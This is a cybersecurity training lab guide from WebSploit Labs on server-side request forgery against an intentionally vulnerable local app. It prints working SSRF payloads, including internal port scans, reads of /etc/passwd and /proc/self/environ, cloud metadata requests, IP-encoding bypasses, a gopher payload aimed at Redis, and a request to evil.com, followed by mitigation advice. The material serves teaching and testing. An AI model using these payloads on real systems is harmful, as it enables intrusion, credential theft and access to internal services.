SSRF Forge: A WebSploit Labs Internal Threat Simulation
Created by Omar Santos for WebSploit Labs - Cybersecurity Education
WebSploit Labs is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking, Bug Hunting, Incident Response, Digital Forensics, and Threat Hunting training sessions. WebSploit Labs includes several intentionally vulnerable applications running in Docker containers on top of Kali Linux or Parrot Security OS, several additional tools, and over 9,000 cybersecurity resources.
WebSploit Labs has been used by many colleges and universities in different countries.
WebSploit comes with a set of intentionally vulnerable applications running in Docker containers on top of Kali Linux or Parrot Security OS, several additional tools, and over 9,000 cybersecurity resources. Those containers were created in x86_64 architecture and can be run in any x86_64 Linux system. However, if you are using a macOS in Apple Silicon, you can complete this lab without the need of running the containers.
๐ฏ Learning Objectives
By completing this lab, students will learn to: - Identify Server-Side Request Forgery (SSRF) vulnerabilities - Exploit SSRF to access internal services - Understand the impact of SSRF attacks - Learn mitigation techniques
๐ Prerequisites
- Basic understanding of HTTP requests
- Familiarity with web application testing
- Burp Suite or similar proxy tool (optional)
- Access to the SSRF vulnerable application
๐ Lab Setup
Install Dependencies
Running the Application
Docker Setup (Recommended)
There is a Dockerfile in the SSRF directory. However, the following example is provided for your convenience:
FROM python:3.9-slim
WORKDIR /app
COPY ssrf_app.py .
RUN pip install flask requests urllib3
EXPOSE 5012
CMD ["python", "ssrf_app.py"]
To build and run the Docker container:
๐ Understanding SSRF
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests from the server to arbitrary destinations. This can lead to: - Access to internal services - Information disclosure - Port scanning of internal networks - Cloud metadata access - Potential remote code execution
๐งช Testing Methodology
Phase 1: Reconnaissance and Mapping
1.1 Identify Input Points
Navigate to http://localhost:5012
and identify all endpoints that accept URLs:
- Web Content Fetcher (
/fetch
) - Website Screenshot Service (
/screenshot
) - Webhook Tester (
/webhook
) - URL Metadata Analyzer (
/analyze
) - Link Validator (
/validate
) - API Proxy (
/api/proxy
) - Health Check (
/health
)
1.2 Test Normal Functionality
Before testing for SSRF, understand normal behavior:
# Test with legitimate external URL
curl -X POST http://localhost:5012/fetch -d "url=https://httpbin.org/get"
Phase 2: Basic SSRF Testing
2.1 Internal Network Access
Test if you can access internal services:
# Test localhost access
curl -X POST http://localhost:5012/fetch -d "url=http://localhost:5012/health"
# Test different localhost variations
- http://127.0.0.1:5012
- http://0.0.0.0:5012
- http://[::1]:5012
- http://localhost.localdomain:5012
2.2 Port Scanning
Use SSRF to scan internal ports:
# Common internal services
curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:22" # SSH
curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:3306" # MySQL
curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:6379" # Redis
curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:27017" # MongoDB
2.3 Protocol Testing
Test different protocols:
# File protocol (if supported)
curl -X POST http://localhost:5012/fetch -d "url=file:///etc/passwd"
# FTP protocol
curl -X POST http://localhost:5012/fetch -d "url=ftp://internal-ftp-server/"
# LDAP protocol
curl -X POST http://localhost:5012/fetch -d "url=ldap://internal-ldap/"
Phase 3: Advanced SSRF Exploitation
3.1 Cloud Metadata Access
If running in cloud environments:
# AWS EC2 metadata
curl -X POST http://localhost:5012/fetch -d "url=http://169.254.169.254/latest/meta-data/"
# Google Cloud metadata
curl -X POST http://localhost:5012/fetch -d "url=http://metadata.google.internal/computeMetadata/v1/"
# Azure metadata
curl -X POST http://localhost:5012/fetch -d "url=http://169.254.169.254/metadata/instance?api-version=2029-02-01"
3.2 Bypass Techniques
URL Encoding:
# Double URL encoding
curl -X POST http://localhost:5012/fetch -d "url=http%253A%252F%252F127.0.0.1%253A22"
Alternative IP Representations:
# Decimal representation of 127.0.0.1
curl -X POST http://localhost:5012/fetch -d "url=http://2130706433:5012"
# Hexadecimal representation
curl -X POST http://localhost:5012/fetch -d "url=http://0x7f000001:5012"
# Mixed representations
curl -X POST http://localhost:5012/fetch -d "url=http://127.1:5012"
DNS-based bypasses:
# Using DNS that resolves to localhost
curl -X POST http://localhost:5012/fetch -d "url=http://localtest.me:5012"
curl -X POST http://localhost:5012/fetch -d "url=http://lvh.me:5012"
3.3 Webhook Exploitation
Test the webhook functionality:
# Use webhook.site for testing
curl -X POST http://localhost:5012/webhook \
-d "webhook_url=https://webhook.site/your-unique-id" \
-d "data=SSRF test payload"
# Test internal webhook
curl -X POST http://localhost:5012/webhook \
-d "webhook_url=http://127.0.0.1:5012/health" \
-d "data=internal request"
Phase 4: Impact Assessment
4.1 Information Gathering
Document what information you can gather:
- Internal service discovery
- Response headers revealing server information
- Error messages disclosing internal paths
- Network topology information
4.2 Chaining Attacks
Combine SSRF with other vulnerabilities:
# Test for reflected content (potential XSS)
curl -X POST http://localhost:5012/analyze -d "target_url=http://evil.com/xss-payload"
# Test for SSRF + Local File Inclusion
curl -X POST http://localhost:5012/fetch -d "url=file:///proc/self/environ"
๐ง Testing with Burp Suite
4.1 Intercepting Requests
- Configure browser to use Burp proxy
- Navigate to vulnerable endpoints
- Capture and modify requests in Burp Repeater
4.2 Automated Testing
Use Burp's SSRF detection extensions: - Collaborator for out-of-band testing - Intruder for payload fuzzing - Scanner for automated SSRF detection
๐ฏ Specific Test Cases
Test Case 1: Basic Internal Access
# Objective: Access the application's own health endpoint
curl -X POST http://localhost:5012/fetch -d "url=http://localhost:5012/health"
# Expected: Should return health check information
# Impact: Confirms SSRF vulnerability exists
Test Case 2: Port Scanning
# Objective: Discover internal services
for port in 22 80 443 3306 5432 6379 8080; do
echo "Testing port $port:"
curl -s -X POST http://localhost:5012/validate -d "link=http://127.0.0.1:$port" | grep -E "(accessible|Status Code)"
done
Test Case 3: Protocol Smuggling
# Objective: Test different protocols
curl -X POST http://localhost:5012/fetch -d "url=gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo%0d%0a"
# Expected: Potential Redis interaction via Gopher protocol
Test Case 4: Time-based Detection
# Objective: Detect SSRF through response timing
time curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:22"
time curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:12345"
# Compare response times to detect open/closed ports
๐ก๏ธ Detection and Mitigation
Detection Techniques
- Network Monitoring: Monitor outbound connections from web servers
- Log Analysis: Look for unusual internal URL requests
- Response Analysis: Check for internal service responses in application output
Mitigation Strategies
- Input Validation: Whitelist allowed domains/protocols
- Network Segmentation: Restrict server's network access
- URL Parsing: Use secure URL parsing libraries
- Response Filtering: Don't return raw responses to users
Code Fix Examples
# Example mitigation code
import ipaddress
from urllib.parse import urlparse
def is_safe_url(url):
"""Check if URL is safe from SSRF"""
try:
parsed = urlparse(url)
# Block non-HTTP protocols
if parsed.scheme not in ['http', 'https']:
return False
# Block private IP ranges
ip = ipaddress.ip_address(parsed.hostname)
if ip.is_private or ip.is_loopback:
return False
return True
except:
return False
๐ Lab Report Template
Vulnerability Summary
- Vulnerability Type: Server-Side Request Forgery (SSRF)
- Severity: High
- Affected Endpoints: [List discovered endpoints]
Technical Details
- Root Cause: Lack of input validation on URL parameters
- Attack Vectors: [Document successful attack methods]
- Impact: [Describe potential damage]
Proof of Concept
# Include working exploit commands
curl -X POST http://localhost:5012/fetch -d "url=http://127.0.0.1:22"
Remediation
- Implement URL validation
- Use allowlists for permitted domains
- Add network-level restrictions
๐ Learning Questions
-
Identification: How can you identify SSRF vulnerabilities in web applications?
-
Exploitation: What are the most effective techniques for bypassing SSRF filters?
-
Impact: What are the potential business impacts of SSRF vulnerabilities?
-
Prevention: How would you implement secure URL handling in a web application?
-
Detection: What monitoring strategies would help detect SSRF attacks?